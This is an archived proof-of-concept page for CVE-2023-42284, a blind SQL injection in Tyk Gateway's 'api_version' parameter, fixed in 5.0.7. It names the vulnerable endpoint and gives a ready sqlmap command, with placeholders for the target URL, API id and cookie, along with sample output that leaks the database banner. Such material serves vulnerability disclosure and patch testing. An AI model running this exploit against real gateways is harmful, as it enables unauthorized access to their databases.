Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-42284 PoC — Tyk Gateway 安全漏洞

Source
https://github.com/andreysanyuk/CVE-2023-42284
Associated Vulnerability
Title:Tyk Gateway 安全漏洞 (CVE-2023-42284)
Description:Tyk Gateway是Tyk Technologies开源的一个云型、开源的 API 网关。 Tyk Gateway 5.0.3版本存在安全漏洞。攻击者利用该漏洞通过特制的SQL查询访问和转储数据库。
Description
  Proof of concept for CVE-2023-42284 in Tyk Gateway
Readme
# Disclaimer
For educational purpose only!

## Details
Proof of concept for CVE-2023-42284.
Tyk Gateway is vulnerable to SQL injection.
Fixed in 5.0.7 version.

The URL parameter ‘api_version’ of the "https://<YOUR_URL>/api/errors/count/...?res=day&p=...&api_version=<PAYLOAD_HERE>&api_id=..."is vulnerable to Blind SQL injection.

## Exploitation

Use sqlmap with following parameters:

```
python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE> --banner
```

SQL DB banner is returned in response:

```
...
banner: Postgresql 13.01 on x86_64-pc-linux-gnu
...
```
File Snapshot

 [4.0K]  /data/pocs/5feb14fa8df6a71d54c7a641b0290348f4cf8771
└── [ 722]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.